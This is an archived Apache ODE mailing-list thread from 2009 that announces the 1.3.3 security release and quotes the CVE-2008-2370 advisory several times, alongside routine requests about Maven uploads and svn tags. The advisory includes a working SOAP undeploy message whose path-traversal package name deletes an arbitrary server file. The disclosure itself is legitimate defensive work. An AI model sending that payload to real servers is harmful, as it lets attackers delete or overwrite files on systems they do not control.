You are viewing a plain text version of this content. The canonical link for it is here.
Posted to dev@ode.apache.org by "Nowakowski, Mateusz" <Ma...@sabre-holdings.com> on 2009/08/17 11:20:54 UTC
No Apache ODE 1.3.3 in Maven repos
Is it so difficult to populate the newest ODE to maven repos?
:)
--
Regards
Mateusz Nowakowski
-----Original Message-----
From: Nowakowski, Mateusz [mailto:Mateusz.Nowakowski@sabre-holdings.com]
Sent: Thursday, August 13, 2009 10:22 AM
To: dev@ode.apache.org; user@ode.apache.org
Subject: RE: [ANNOUNCE] Apache ODE 1.3.3
Any update on that?
I'm trying to find for example ODE 1.3.3 here:
http://repo1.maven.org/maven2/org/apache/ode/ode-jbi/
but the newest version is 1.3.2.
--
Regards
Mateusz Nowakowski
-----Original Message-----
From: Nowakowski, Mateusz [mailto:Mateusz.Nowakowski@sabre-holdings.com]
Sent: Tuesday, August 11, 2009 5:32 PM
To: dev@ode.apache.org
Subject: RE: [ANNOUNCE] Apache ODE 1.3.3 -
Hi,
I couldn't find ODE 1.3.3 in the main maven repository.
Could you place it there?
Thanks
--
Regards
Mateusz Nowakowski
-----Original Message-----
From: matthieu.riou@gmail.com [mailto:matthieu.riou@gmail.com] On Behalf Of Matthieu Riou
Sent: Saturday, August 08, 2009 6:41 AM
To: security@apache.org; full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com; dev@ode.apache.org; user@ode.apache.org; Marc Schoenefeld; announce@apache.org
Subject: [ANNOUNCE] Apache ODE 1.3.3
Hi,
I'm pleased to announce the release of ODE 1.3.3, a security release of
Apache ODE. It fixes a vulnerability in the process deployment that allowed,
using a forged message, to create, overwrite or delete files on the server
file system. See the full vulnerability announcement below.
Apache ODE is a WS-BPEL compliant web service orchestration engine. It
organizes web services calls following a process description written in the
BPEL XML grammar. Another way to describe it would be a web-service capable
workflow engine.
This new release also includes new features, bug fixes and improvements See
the release notes for an exhaustive list for
details.<https://issues.apache.org/jira/browse/ODE/fixforversion/12313906>
For more information, check the Apache ODE website:
http://ode.apache.org/
Apache ODE is an open source project released under a business-friendly
license (Apache License v2.0), as such we welcome your help and
contributions. To participate and get involved, our mailing lists are the
best resources to start from:
http://ode.apache.org/mailing-lists.html
Thank you,
The Apache ODE Team
------
CVE-2008-2370: Apache ODE information disclosure vulnerability
Severity: Medium
Vendor: The Apache Software Foundation
Versions Affected: ODE 1.0-incubating to ODE 1.3.2. The unsupported ODE
2.0-beta1 and 2.0-beta2 are also affected.
Description: The process deployment web service was sensible to deployment
messages with forged names. Using a path for the name was allowing directory
traversal, resulting in the potential writing of files under unwanted
locations (like a new WAR under a webapp deployment directory), the
overwriting of existing files or their deletion.
Mitigation: 1.x users should upgrade to 1.3.3. 2.0-betaX users should obtain
the latest source from svn or apply the patch published under
http://people.apache.org/~mriou/CVE-2008-2370-patch.txt<http://people.apache.org/%7Emriou/CVE-2008-2370-patch.txt>.
Example: Deleting a file /tmp/blabla using undeploy by sending the following
message to the deployment service:
<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:pmap="http://www.apache.org/ode/pmapi">
<soapenv:Header/>
<soapenv:Body>
<pmap:undeploy>
<packageName>../../../../../../../../../../../../../../tmp/blabla</packageName>
</pmap:undeploy>
</soapenv:Body>
</soapenv:Envelope>
Credit: This issue was discovered by Marc Schoenefeld of Red Hat.
RE: No Apache ODE 1.3.3 in Maven repos
Posted by "Nowakowski, Mateusz" <Ma...@sabre-holdings.com>.
Thanks!
--
Regards
Mateusz Nowakowski
-----Original Message-----
From: Matthieu Riou [mailto:matthieu.riou@gmail.com]
Sent: Tuesday, August 18, 2009 6:15 PM
To: dev@ode.apache.org
Cc: user@ode.apache.org
Subject: Re: No Apache ODE 1.3.3 in Maven repos
On Mon, Aug 17, 2009 at 7:17 AM, Matthieu Riou <ma...@gmail.com>wrote:
> On Mon, Aug 17, 2009 at 2:20 AM, Nowakowski, Mateusz <
> Mateusz.Nowakowski@sabre-holdings.com> wrote:
>
>> Is it so difficult to populate the newest ODE to maven repos?
>> :)
>>
>
> Ah sorry, it's not difficult, I just need some time to do it. Hopefully
> later today.
>
It's uploaded and mirrored now:
http://repo1.maven.org/maven2/org/apache/ode/
>
> Matthieu
>
>
>>
>> --
>>
>> Regards
>> Mateusz Nowakowski
>>
>> -----Original Message-----
>> From: Nowakowski, Mateusz [mailto:Mateusz.Nowakowski@sabre-holdings.com]
>> Sent: Thursday, August 13, 2009 10:22 AM
>> To: dev@ode.apache.org; user@ode.apache.org
>> Subject: RE: [ANNOUNCE] Apache ODE 1.3.3
>>
>> Any update on that?
>>
>> I'm trying to find for example ODE 1.3.3 here:
>> http://repo1.maven.org/maven2/org/apache/ode/ode-jbi/
>> but the newest version is 1.3.2.
>>
>> --
>> Regards
>> Mateusz Nowakowski
>> -----Original Message-----
>> From: Nowakowski, Mateusz [mailto:Mateusz.Nowakowski@sabre-holdings.com]
>> Sent: Tuesday, August 11, 2009 5:32 PM
>> To: dev@ode.apache.org
>> Subject: RE: [ANNOUNCE] Apache ODE 1.3.3 -
>>
>> Hi,
>>
>> I couldn't find ODE 1.3.3 in the main maven repository.
>> Could you place it there?
>>
>> Thanks
>>
>> --
>> Regards
>> Mateusz Nowakowski
>>
>> -----Original Message-----
>> From: matthieu.riou@gmail.com [mailto:matthieu.riou@gmail.com] On Behalf
>> Of Matthieu Riou
>> Sent: Saturday, August 08, 2009 6:41 AM
>> To: security@apache.org; full-disclosure@lists.grok.org.uk;
>> bugtraq@securityfocus.com; dev@ode.apache.org; user@ode.apache.org; Marc
>> Schoenefeld; announce@apache.org
>> Subject: [ANNOUNCE] Apache ODE 1.3.3
>>
>> Hi,
>>
>> I'm pleased to announce the release of ODE 1.3.3, a security release of
>> Apache ODE. It fixes a vulnerability in the process deployment that
>> allowed,
>> using a forged message, to create, overwrite or delete files on the server
>> file system. See the full vulnerability announcement below.
>>
>> Apache ODE is a WS-BPEL compliant web service orchestration engine. It
>> organizes web services calls following a process description written in
>> the
>> BPEL XML grammar. Another way to describe it would be a web-service
>> capable
>> workflow engine.
>>
>> This new release also includes new features, bug fixes and improvements
>> See
>> the release notes for an exhaustive list for
>> details.<https://issues.apache.org/jira/browse/ODE/fixforversion/12313906
>> >
>>
>> For more information, check the Apache ODE website:
>> http://ode.apache.org/
>>
>> Apache ODE is an open source project released under a business-friendly
>> license (Apache License v2.0), as such we welcome your help and
>> contributions. To participate and get involved, our mailing lists are the
>> best resources to start from:
>> http://ode.apache.org/mailing-lists.html
>>
>> Thank you,
>> The Apache ODE Team
>>
>> ------
>>
>> CVE-2008-2370: Apache ODE information disclosure vulnerability
>>
>> Severity: Medium
>>
>> Vendor: The Apache Software Foundation
>>
>> Versions Affected: ODE 1.0-incubating to ODE 1.3.2. The unsupported ODE
>> 2.0-beta1 and 2.0-beta2 are also affected.
>>
>> Description: The process deployment web service was sensible to deployment
>> messages with forged names. Using a path for the name was allowing
>> directory
>> traversal, resulting in the potential writing of files under unwanted
>> locations (like a new WAR under a webapp deployment directory), the
>> overwriting of existing files or their deletion.
>>
>> Mitigation: 1.x users should upgrade to 1.3.3. 2.0-betaX users should
>> obtain
>> the latest source from svn or apply the patch published under
>> http://people.apache.org/~mriou/CVE-2008-2370-patch.txt<http://people.apache.org/%7Emriou/CVE-2008-2370-patch.txt>
>> <http://people.apache.org/%7Emriou/CVE-2008-2370-patch.txt>.
>>
>>
>> Example: Deleting a file /tmp/blabla using undeploy by sending the
>> following
>> message to the deployment service:
>>
>> <?xml version="1.0" encoding="UTF-8"?>
>> <soapenv:Envelope xmlns:soapenv="
>> http://schemas.xmlsoap.org/soap/envelope/"
>> xmlns:pmap="http://www.apache.org/ode/pmapi">
>> <soapenv:Header/>
>> <soapenv:Body>
>> <pmap:undeploy>
>>
>> <packageName>../../../../../../../../../../../../../../tmp/blabla</packageName>
>> </pmap:undeploy>
>> </soapenv:Body>
>> </soapenv:Envelope>
>> Credit: This issue was discovered by Marc Schoenefeld of Red Hat.
>>
>
>
Re: No svn tag for ODE 1.3.3
Posted by Alex Boisvert <bo...@intalio.com>.
I just fixed both.
alex
On Wed, Aug 19, 2009 at 8:30 AM, Nowakowski, Mateusz <
Mateusz.Nowakowski@sabre-holdings.com> wrote:
> I'll tried to download a svn tag for ODE 1.3.3, but I couldn't find it.
> It isn't here:
> http://svn.apache.org/repos/asf/ode/tags/APACHE_ODE_1.3.3
>
> What is more JIRA says that ODE 1.3.3 is not a released version.
>
> --
> Regards
> Mateusz Nowakowski
>
Re: No svn tag for ODE 1.3.3
Posted by Alex Boisvert <bo...@intalio.com>.
I just fixed both.
alex
On Wed, Aug 19, 2009 at 8:30 AM, Nowakowski, Mateusz <
Mateusz.Nowakowski@sabre-holdings.com> wrote:
> I'll tried to download a svn tag for ODE 1.3.3, but I couldn't find it.
> It isn't here:
> http://svn.apache.org/repos/asf/ode/tags/APACHE_ODE_1.3.3
>
> What is more JIRA says that ODE 1.3.3 is not a released version.
>
> --
> Regards
> Mateusz Nowakowski
>
No svn tag for ODE 1.3.3
Posted by "Nowakowski, Mateusz" <Ma...@sabre-holdings.com>.
I'll tried to download a svn tag for ODE 1.3.3, but I couldn't find it.
It isn't here:
http://svn.apache.org/repos/asf/ode/tags/APACHE_ODE_1.3.3
What is more JIRA says that ODE 1.3.3 is not a released version.
--
Regards
Mateusz Nowakowski
No svn tag for ODE 1.3.3
Posted by "Nowakowski, Mateusz" <Ma...@sabre-holdings.com>.
I'll tried to download a svn tag for ODE 1.3.3, but I couldn't find it.
It isn't here:
http://svn.apache.org/repos/asf/ode/tags/APACHE_ODE_1.3.3
What is more JIRA says that ODE 1.3.3 is not a released version.
--
Regards
Mateusz Nowakowski
RE: No Apache ODE 1.3.3 in Maven repos
Posted by "Nowakowski, Mateusz" <Ma...@sabre-holdings.com>.
Thanks!
--
Regards
Mateusz Nowakowski
-----Original Message-----
From: Matthieu Riou [mailto:matthieu.riou@gmail.com]
Sent: Tuesday, August 18, 2009 6:15 PM
To: dev@ode.apache.org
Cc: user@ode.apache.org
Subject: Re: No Apache ODE 1.3.3 in Maven repos
On Mon, Aug 17, 2009 at 7:17 AM, Matthieu Riou <ma...@gmail.com>wrote:
> On Mon, Aug 17, 2009 at 2:20 AM, Nowakowski, Mateusz <
> Mateusz.Nowakowski@sabre-holdings.com> wrote:
>
>> Is it so difficult to populate the newest ODE to maven repos?
>> :)
>>
>
> Ah sorry, it's not difficult, I just need some time to do it. Hopefully
> later today.
>
It's uploaded and mirrored now:
http://repo1.maven.org/maven2/org/apache/ode/
>
> Matthieu
>
>
>>
>> --
>>
>> Regards
>> Mateusz Nowakowski
>>
>> -----Original Message-----
>> From: Nowakowski, Mateusz [mailto:Mateusz.Nowakowski@sabre-holdings.com]
>> Sent: Thursday, August 13, 2009 10:22 AM
>> To: dev@ode.apache.org; user@ode.apache.org
>> Subject: RE: [ANNOUNCE] Apache ODE 1.3.3
>>
>> Any update on that?
>>
>> I'm trying to find for example ODE 1.3.3 here:
>> http://repo1.maven.org/maven2/org/apache/ode/ode-jbi/
>> but the newest version is 1.3.2.
>>
>> --
>> Regards
>> Mateusz Nowakowski
>> -----Original Message-----
>> From: Nowakowski, Mateusz [mailto:Mateusz.Nowakowski@sabre-holdings.com]
>> Sent: Tuesday, August 11, 2009 5:32 PM
>> To: dev@ode.apache.org
>> Subject: RE: [ANNOUNCE] Apache ODE 1.3.3 -
>>
>> Hi,
>>
>> I couldn't find ODE 1.3.3 in the main maven repository.
>> Could you place it there?
>>
>> Thanks
>>
>> --
>> Regards
>> Mateusz Nowakowski
>>
>> -----Original Message-----
>> From: matthieu.riou@gmail.com [mailto:matthieu.riou@gmail.com] On Behalf
>> Of Matthieu Riou
>> Sent: Saturday, August 08, 2009 6:41 AM
>> To: security@apache.org; full-disclosure@lists.grok.org.uk;
>> bugtraq@securityfocus.com; dev@ode.apache.org; user@ode.apache.org; Marc
>> Schoenefeld; announce@apache.org
>> Subject: [ANNOUNCE] Apache ODE 1.3.3
>>
>> Hi,
>>
>> I'm pleased to announce the release of ODE 1.3.3, a security release of
>> Apache ODE. It fixes a vulnerability in the process deployment that
>> allowed,
>> using a forged message, to create, overwrite or delete files on the server
>> file system. See the full vulnerability announcement below.
>>
>> Apache ODE is a WS-BPEL compliant web service orchestration engine. It
>> organizes web services calls following a process description written in
>> the
>> BPEL XML grammar. Another way to describe it would be a web-service
>> capable
>> workflow engine.
>>
>> This new release also includes new features, bug fixes and improvements
>> See
>> the release notes for an exhaustive list for
>> details.<https://issues.apache.org/jira/browse/ODE/fixforversion/12313906
>> >
>>
>> For more information, check the Apache ODE website:
>> http://ode.apache.org/
>>
>> Apache ODE is an open source project released under a business-friendly
>> license (Apache License v2.0), as such we welcome your help and
>> contributions. To participate and get involved, our mailing lists are the
>> best resources to start from:
>> http://ode.apache.org/mailing-lists.html
>>
>> Thank you,
>> The Apache ODE Team
>>
>> ------
>>
>> CVE-2008-2370: Apache ODE information disclosure vulnerability
>>
>> Severity: Medium
>>
>> Vendor: The Apache Software Foundation
>>
>> Versions Affected: ODE 1.0-incubating to ODE 1.3.2. The unsupported ODE
>> 2.0-beta1 and 2.0-beta2 are also affected.
>>
>> Description: The process deployment web service was sensible to deployment
>> messages with forged names. Using a path for the name was allowing
>> directory
>> traversal, resulting in the potential writing of files under unwanted
>> locations (like a new WAR under a webapp deployment directory), the
>> overwriting of existing files or their deletion.
>>
>> Mitigation: 1.x users should upgrade to 1.3.3. 2.0-betaX users should
>> obtain
>> the latest source from svn or apply the patch published under
>> http://people.apache.org/~mriou/CVE-2008-2370-patch.txt<http://people.apache.org/%7Emriou/CVE-2008-2370-patch.txt>
>> <http://people.apache.org/%7Emriou/CVE-2008-2370-patch.txt>.
>>
>>
>> Example: Deleting a file /tmp/blabla using undeploy by sending the
>> following
>> message to the deployment service:
>>
>> <?xml version="1.0" encoding="UTF-8"?>
>> <soapenv:Envelope xmlns:soapenv="
>> http://schemas.xmlsoap.org/soap/envelope/"
>> xmlns:pmap="http://www.apache.org/ode/pmapi">
>> <soapenv:Header/>
>> <soapenv:Body>
>> <pmap:undeploy>
>>
>> <packageName>../../../../../../../../../../../../../../tmp/blabla</packageName>
>> </pmap:undeploy>
>> </soapenv:Body>
>> </soapenv:Envelope>
>> Credit: This issue was discovered by Marc Schoenefeld of Red Hat.
>>
>
>
Re: No Apache ODE 1.3.3 in Maven repos
Posted by Matthieu Riou <ma...@gmail.com>.
On Mon, Aug 17, 2009 at 7:17 AM, Matthieu Riou <ma...@gmail.com>wrote:
> On Mon, Aug 17, 2009 at 2:20 AM, Nowakowski, Mateusz <
> Mateusz.Nowakowski@sabre-holdings.com> wrote:
>
>> Is it so difficult to populate the newest ODE to maven repos?
>> :)
>>
>
> Ah sorry, it's not difficult, I just need some time to do it. Hopefully
> later today.
>
It's uploaded and mirrored now:
http://repo1.maven.org/maven2/org/apache/ode/
>
> Matthieu
>
>
>>
>> --
>>
>> Regards
>> Mateusz Nowakowski
>>
>> -----Original Message-----
>> From: Nowakowski, Mateusz [mailto:Mateusz.Nowakowski@sabre-holdings.com]
>> Sent: Thursday, August 13, 2009 10:22 AM
>> To: dev@ode.apache.org; user@ode.apache.org
>> Subject: RE: [ANNOUNCE] Apache ODE 1.3.3
>>
>> Any update on that?
>>
>> I'm trying to find for example ODE 1.3.3 here:
>> http://repo1.maven.org/maven2/org/apache/ode/ode-jbi/
>> but the newest version is 1.3.2.
>>
>> --
>> Regards
>> Mateusz Nowakowski
>> -----Original Message-----
>> From: Nowakowski, Mateusz [mailto:Mateusz.Nowakowski@sabre-holdings.com]
>> Sent: Tuesday, August 11, 2009 5:32 PM
>> To: dev@ode.apache.org
>> Subject: RE: [ANNOUNCE] Apache ODE 1.3.3 -
>>
>> Hi,
>>
>> I couldn't find ODE 1.3.3 in the main maven repository.
>> Could you place it there?
>>
>> Thanks
>>
>> --
>> Regards
>> Mateusz Nowakowski
>>
>> -----Original Message-----
>> From: matthieu.riou@gmail.com [mailto:matthieu.riou@gmail.com] On Behalf
>> Of Matthieu Riou
>> Sent: Saturday, August 08, 2009 6:41 AM
>> To: security@apache.org; full-disclosure@lists.grok.org.uk;
>> bugtraq@securityfocus.com; dev@ode.apache.org; user@ode.apache.org; Marc
>> Schoenefeld; announce@apache.org
>> Subject: [ANNOUNCE] Apache ODE 1.3.3
>>
>> Hi,
>>
>> I'm pleased to announce the release of ODE 1.3.3, a security release of
>> Apache ODE. It fixes a vulnerability in the process deployment that
>> allowed,
>> using a forged message, to create, overwrite or delete files on the server
>> file system. See the full vulnerability announcement below.
>>
>> Apache ODE is a WS-BPEL compliant web service orchestration engine. It
>> organizes web services calls following a process description written in
>> the
>> BPEL XML grammar. Another way to describe it would be a web-service
>> capable
>> workflow engine.
>>
>> This new release also includes new features, bug fixes and improvements
>> See
>> the release notes for an exhaustive list for
>> details.<https://issues.apache.org/jira/browse/ODE/fixforversion/12313906
>> >
>>
>> For more information, check the Apache ODE website:
>> http://ode.apache.org/
>>
>> Apache ODE is an open source project released under a business-friendly
>> license (Apache License v2.0), as such we welcome your help and
>> contributions. To participate and get involved, our mailing lists are the
>> best resources to start from:
>> http://ode.apache.org/mailing-lists.html
>>
>> Thank you,
>> The Apache ODE Team
>>
>> ------
>>
>> CVE-2008-2370: Apache ODE information disclosure vulnerability
>>
>> Severity: Medium
>>
>> Vendor: The Apache Software Foundation
>>
>> Versions Affected: ODE 1.0-incubating to ODE 1.3.2. The unsupported ODE
>> 2.0-beta1 and 2.0-beta2 are also affected.
>>
>> Description: The process deployment web service was sensible to deployment
>> messages with forged names. Using a path for the name was allowing
>> directory
>> traversal, resulting in the potential writing of files under unwanted
>> locations (like a new WAR under a webapp deployment directory), the
>> overwriting of existing files or their deletion.
>>
>> Mitigation: 1.x users should upgrade to 1.3.3. 2.0-betaX users should
>> obtain
>> the latest source from svn or apply the patch published under
>> http://people.apache.org/~mriou/CVE-2008-2370-patch.txt<http://people.apache.org/%7Emriou/CVE-2008-2370-patch.txt>
>> <http://people.apache.org/%7Emriou/CVE-2008-2370-patch.txt>.
>>
>>
>> Example: Deleting a file /tmp/blabla using undeploy by sending the
>> following
>> message to the deployment service:
>>
>> <?xml version="1.0" encoding="UTF-8"?>
>> <soapenv:Envelope xmlns:soapenv="
>> http://schemas.xmlsoap.org/soap/envelope/"
>> xmlns:pmap="http://www.apache.org/ode/pmapi">
>> <soapenv:Header/>
>> <soapenv:Body>
>> <pmap:undeploy>
>>
>> <packageName>../../../../../../../../../../../../../../tmp/blabla</packageName>
>> </pmap:undeploy>
>> </soapenv:Body>
>> </soapenv:Envelope>
>> Credit: This issue was discovered by Marc Schoenefeld of Red Hat.
>>
>
>
RE: No Apache ODE 1.3.3 in Maven repos
Posted by "Nowakowski, Mateusz" <Ma...@sabre-holdings.com>.
Thanks!
I took nearly a week to any answer :)
--
Regards
Mateusz Nowakowski
-----Original Message-----
From: Matthieu Riou [mailto:matthieu.riou@gmail.com]
Sent: Monday, August 17, 2009 4:17 PM
To: dev@ode.apache.org
Cc: user@ode.apache.org
Subject: Re: No Apache ODE 1.3.3 in Maven repos
On Mon, Aug 17, 2009 at 2:20 AM, Nowakowski, Mateusz <
Mateusz.Nowakowski@sabre-holdings.com> wrote:
> Is it so difficult to populate the newest ODE to maven repos?
> :)
>
Ah sorry, it's not difficult, I just need some time to do it. Hopefully
later today.
Matthieu
>
> --
> Regards
> Mateusz Nowakowski
>
> -----Original Message-----
> From: Nowakowski, Mateusz [mailto:Mateusz.Nowakowski@sabre-holdings.com]
> Sent: Thursday, August 13, 2009 10:22 AM
> To: dev@ode.apache.org; user@ode.apache.org
> Subject: RE: [ANNOUNCE] Apache ODE 1.3.3
>
> Any update on that?
>
> I'm trying to find for example ODE 1.3.3 here:
> http://repo1.maven.org/maven2/org/apache/ode/ode-jbi/
> but the newest version is 1.3.2.
>
> --
> Regards
> Mateusz Nowakowski
> -----Original Message-----
> From: Nowakowski, Mateusz [mailto:Mateusz.Nowakowski@sabre-holdings.com]
> Sent: Tuesday, August 11, 2009 5:32 PM
> To: dev@ode.apache.org
> Subject: RE: [ANNOUNCE] Apache ODE 1.3.3 -
>
> Hi,
>
> I couldn't find ODE 1.3.3 in the main maven repository.
> Could you place it there?
>
> Thanks
>
> --
> Regards
> Mateusz Nowakowski
>
> -----Original Message-----
> From: matthieu.riou@gmail.com [mailto:matthieu.riou@gmail.com] On Behalf
> Of Matthieu Riou
> Sent: Saturday, August 08, 2009 6:41 AM
> To: security@apache.org; full-disclosure@lists.grok.org.uk;
> bugtraq@securityfocus.com; dev@ode.apache.org; user@ode.apache.org; Marc
> Schoenefeld; announce@apache.org
> Subject: [ANNOUNCE] Apache ODE 1.3.3
>
> Hi,
>
> I'm pleased to announce the release of ODE 1.3.3, a security release of
> Apache ODE. It fixes a vulnerability in the process deployment that
> allowed,
> using a forged message, to create, overwrite or delete files on the server
> file system. See the full vulnerability announcement below.
>
> Apache ODE is a WS-BPEL compliant web service orchestration engine. It
> organizes web services calls following a process description written in the
> BPEL XML grammar. Another way to describe it would be a web-service capable
> workflow engine.
>
> This new release also includes new features, bug fixes and improvements See
> the release notes for an exhaustive list for
> details.<https://issues.apache.org/jira/browse/ODE/fixforversion/12313906>
>
> For more information, check the Apache ODE website:
> http://ode.apache.org/
>
> Apache ODE is an open source project released under a business-friendly
> license (Apache License v2.0), as such we welcome your help and
> contributions. To participate and get involved, our mailing lists are the
> best resources to start from:
> http://ode.apache.org/mailing-lists.html
>
> Thank you,
> The Apache ODE Team
>
> ------
>
> CVE-2008-2370: Apache ODE information disclosure vulnerability
>
> Severity: Medium
>
> Vendor: The Apache Software Foundation
>
> Versions Affected: ODE 1.0-incubating to ODE 1.3.2. The unsupported ODE
> 2.0-beta1 and 2.0-beta2 are also affected.
>
> Description: The process deployment web service was sensible to deployment
> messages with forged names. Using a path for the name was allowing
> directory
> traversal, resulting in the potential writing of files under unwanted
> locations (like a new WAR under a webapp deployment directory), the
> overwriting of existing files or their deletion.
>
> Mitigation: 1.x users should upgrade to 1.3.3. 2.0-betaX users should
> obtain
> the latest source from svn or apply the patch published under
> http://people.apache.org/~mriou/CVE-2008-2370-patch.txt<http://people.apache.org/%7Emriou/CVE-2008-2370-patch.txt>
> <http://people.apache.org/%7Emriou/CVE-2008-2370-patch.txt>.
>
>
> Example: Deleting a file /tmp/blabla using undeploy by sending the
> following
> message to the deployment service:
>
> <?xml version="1.0" encoding="UTF-8"?>
> <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/
> "
> xmlns:pmap="http://www.apache.org/ode/pmapi">
> <soapenv:Header/>
> <soapenv:Body>
> <pmap:undeploy>
>
> <packageName>../../../../../../../../../../../../../../tmp/blabla</packageName>
> </pmap:undeploy>
> </soapenv:Body>
> </soapenv:Envelope>
> Credit: This issue was discovered by Marc Schoenefeld of Red Hat.
>
RE: No Apache ODE 1.3.3 in Maven repos
Posted by "Nowakowski, Mateusz" <Ma...@sabre-holdings.com>.
Thanks!
I took nearly a week to any answer :)
--
Regards
Mateusz Nowakowski
-----Original Message-----
From: Matthieu Riou [mailto:matthieu.riou@gmail.com]
Sent: Monday, August 17, 2009 4:17 PM
To: dev@ode.apache.org
Cc: user@ode.apache.org
Subject: Re: No Apache ODE 1.3.3 in Maven repos
On Mon, Aug 17, 2009 at 2:20 AM, Nowakowski, Mateusz <
Mateusz.Nowakowski@sabre-holdings.com> wrote:
> Is it so difficult to populate the newest ODE to maven repos?
> :)
>
Ah sorry, it's not difficult, I just need some time to do it. Hopefully
later today.
Matthieu
>
> --
> Regards
> Mateusz Nowakowski
>
> -----Original Message-----
> From: Nowakowski, Mateusz [mailto:Mateusz.Nowakowski@sabre-holdings.com]
> Sent: Thursday, August 13, 2009 10:22 AM
> To: dev@ode.apache.org; user@ode.apache.org
> Subject: RE: [ANNOUNCE] Apache ODE 1.3.3
>
> Any update on that?
>
> I'm trying to find for example ODE 1.3.3 here:
> http://repo1.maven.org/maven2/org/apache/ode/ode-jbi/
> but the newest version is 1.3.2.
>
> --
> Regards
> Mateusz Nowakowski
> -----Original Message-----
> From: Nowakowski, Mateusz [mailto:Mateusz.Nowakowski@sabre-holdings.com]
> Sent: Tuesday, August 11, 2009 5:32 PM
> To: dev@ode.apache.org
> Subject: RE: [ANNOUNCE] Apache ODE 1.3.3 -
>
> Hi,
>
> I couldn't find ODE 1.3.3 in the main maven repository.
> Could you place it there?
>
> Thanks
>
> --
> Regards
> Mateusz Nowakowski
>
> -----Original Message-----
> From: matthieu.riou@gmail.com [mailto:matthieu.riou@gmail.com] On Behalf
> Of Matthieu Riou
> Sent: Saturday, August 08, 2009 6:41 AM
> To: security@apache.org; full-disclosure@lists.grok.org.uk;
> bugtraq@securityfocus.com; dev@ode.apache.org; user@ode.apache.org; Marc
> Schoenefeld; announce@apache.org
> Subject: [ANNOUNCE] Apache ODE 1.3.3
>
> Hi,
>
> I'm pleased to announce the release of ODE 1.3.3, a security release of
> Apache ODE. It fixes a vulnerability in the process deployment that
> allowed,
> using a forged message, to create, overwrite or delete files on the server
> file system. See the full vulnerability announcement below.
>
> Apache ODE is a WS-BPEL compliant web service orchestration engine. It
> organizes web services calls following a process description written in the
> BPEL XML grammar. Another way to describe it would be a web-service capable
> workflow engine.
>
> This new release also includes new features, bug fixes and improvements See
> the release notes for an exhaustive list for
> details.<https://issues.apache.org/jira/browse/ODE/fixforversion/12313906>
>
> For more information, check the Apache ODE website:
> http://ode.apache.org/
>
> Apache ODE is an open source project released under a business-friendly
> license (Apache License v2.0), as such we welcome your help and
> contributions. To participate and get involved, our mailing lists are the
> best resources to start from:
> http://ode.apache.org/mailing-lists.html
>
> Thank you,
> The Apache ODE Team
>
> ------
>
> CVE-2008-2370: Apache ODE information disclosure vulnerability
>
> Severity: Medium
>
> Vendor: The Apache Software Foundation
>
> Versions Affected: ODE 1.0-incubating to ODE 1.3.2. The unsupported ODE
> 2.0-beta1 and 2.0-beta2 are also affected.
>
> Description: The process deployment web service was sensible to deployment
> messages with forged names. Using a path for the name was allowing
> directory
> traversal, resulting in the potential writing of files under unwanted
> locations (like a new WAR under a webapp deployment directory), the
> overwriting of existing files or their deletion.
>
> Mitigation: 1.x users should upgrade to 1.3.3. 2.0-betaX users should
> obtain
> the latest source from svn or apply the patch published under
> http://people.apache.org/~mriou/CVE-2008-2370-patch.txt<http://people.apache.org/%7Emriou/CVE-2008-2370-patch.txt>
> <http://people.apache.org/%7Emriou/CVE-2008-2370-patch.txt>.
>
>
> Example: Deleting a file /tmp/blabla using undeploy by sending the
> following
> message to the deployment service:
>
> <?xml version="1.0" encoding="UTF-8"?>
> <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/
> "
> xmlns:pmap="http://www.apache.org/ode/pmapi">
> <soapenv:Header/>
> <soapenv:Body>
> <pmap:undeploy>
>
> <packageName>../../../../../../../../../../../../../../tmp/blabla</packageName>
> </pmap:undeploy>
> </soapenv:Body>
> </soapenv:Envelope>
> Credit: This issue was discovered by Marc Schoenefeld of Red Hat.
>
Re: No Apache ODE 1.3.3 in Maven repos
Posted by Matthieu Riou <ma...@gmail.com>.
On Mon, Aug 17, 2009 at 7:17 AM, Matthieu Riou <ma...@gmail.com>wrote:
> On Mon, Aug 17, 2009 at 2:20 AM, Nowakowski, Mateusz <
> Mateusz.Nowakowski@sabre-holdings.com> wrote:
>
>> Is it so difficult to populate the newest ODE to maven repos?
>> :)
>>
>
> Ah sorry, it's not difficult, I just need some time to do it. Hopefully
> later today.
>
It's uploaded and mirrored now:
http://repo1.maven.org/maven2/org/apache/ode/
>
> Matthieu
>
>
>>
>> --
>>
>> Regards
>> Mateusz Nowakowski
>>
>> -----Original Message-----
>> From: Nowakowski, Mateusz [mailto:Mateusz.Nowakowski@sabre-holdings.com]
>> Sent: Thursday, August 13, 2009 10:22 AM
>> To: dev@ode.apache.org; user@ode.apache.org
>> Subject: RE: [ANNOUNCE] Apache ODE 1.3.3
>>
>> Any update on that?
>>
>> I'm trying to find for example ODE 1.3.3 here:
>> http://repo1.maven.org/maven2/org/apache/ode/ode-jbi/
>> but the newest version is 1.3.2.
>>
>> --
>> Regards
>> Mateusz Nowakowski
>> -----Original Message-----
>> From: Nowakowski, Mateusz [mailto:Mateusz.Nowakowski@sabre-holdings.com]
>> Sent: Tuesday, August 11, 2009 5:32 PM
>> To: dev@ode.apache.org
>> Subject: RE: [ANNOUNCE] Apache ODE 1.3.3 -
>>
>> Hi,
>>
>> I couldn't find ODE 1.3.3 in the main maven repository.
>> Could you place it there?
>>
>> Thanks
>>
>> --
>> Regards
>> Mateusz Nowakowski
>>
>> -----Original Message-----
>> From: matthieu.riou@gmail.com [mailto:matthieu.riou@gmail.com] On Behalf
>> Of Matthieu Riou
>> Sent: Saturday, August 08, 2009 6:41 AM
>> To: security@apache.org; full-disclosure@lists.grok.org.uk;
>> bugtraq@securityfocus.com; dev@ode.apache.org; user@ode.apache.org; Marc
>> Schoenefeld; announce@apache.org
>> Subject: [ANNOUNCE] Apache ODE 1.3.3
>>
>> Hi,
>>
>> I'm pleased to announce the release of ODE 1.3.3, a security release of
>> Apache ODE. It fixes a vulnerability in the process deployment that
>> allowed,
>> using a forged message, to create, overwrite or delete files on the server
>> file system. See the full vulnerability announcement below.
>>
>> Apache ODE is a WS-BPEL compliant web service orchestration engine. It
>> organizes web services calls following a process description written in
>> the
>> BPEL XML grammar. Another way to describe it would be a web-service
>> capable
>> workflow engine.
>>
>> This new release also includes new features, bug fixes and improvements
>> See
>> the release notes for an exhaustive list for
>> details.<https://issues.apache.org/jira/browse/ODE/fixforversion/12313906
